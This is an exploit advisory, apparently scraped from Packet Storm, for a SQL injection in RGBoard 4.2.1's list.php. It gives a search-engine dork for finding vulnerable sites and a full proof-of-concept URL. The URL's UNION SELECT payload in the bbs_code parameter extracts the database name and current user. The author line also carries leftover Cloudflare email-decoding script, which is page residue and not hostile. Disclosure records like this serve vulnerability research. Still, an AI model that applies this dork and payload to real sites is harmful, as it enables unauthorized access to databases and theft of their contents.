RGBoard 4.2.1 SQL Injection

2011-06-28T00:00:00
ID PACKETSTORM:102619
Type packetstorm
Reporter hamt0ry
Modified 2011-06-28T00:00:00

Description

                                        
                                            `* Exploit Title: rgboard SQL Injection Vulnerability  
  
* inurl: rgboard4/list.php  
  
* Date: 2011. 6.22  
  
* Author: hamt0ry (hamt0ry@163.com<script type="text/javascript">  
/* <![CDATA[ */  
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();  
/* ]]> */  
</script>)  
  
* Test on : Windowss XP SP3  
  
* Software Link: http://v4.rgboard.com/rg4_board/down.php?&bbs_code=rgboard_pds&bd_num=1757&key=0&mode=down  
  
* Version: rgboard 4.2.1  
  
* SQL Injection  
  
http://[target]/list.php?bbs_code=notice[SQL]  
  
* POC : http://site/list.php?bbs_code=notice'+and+1=2+union+select+1%2C2%2C3%2C4%2C1%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2Cdatabase()%2C(select%20concat(0x2f,unhex(Hex(cast(user()%20as%20char)))))%2C30%2C31%2C32%2C33%2C34%2C35%2C6%2C5%2C4%2C3%2C2%23  
  
  
`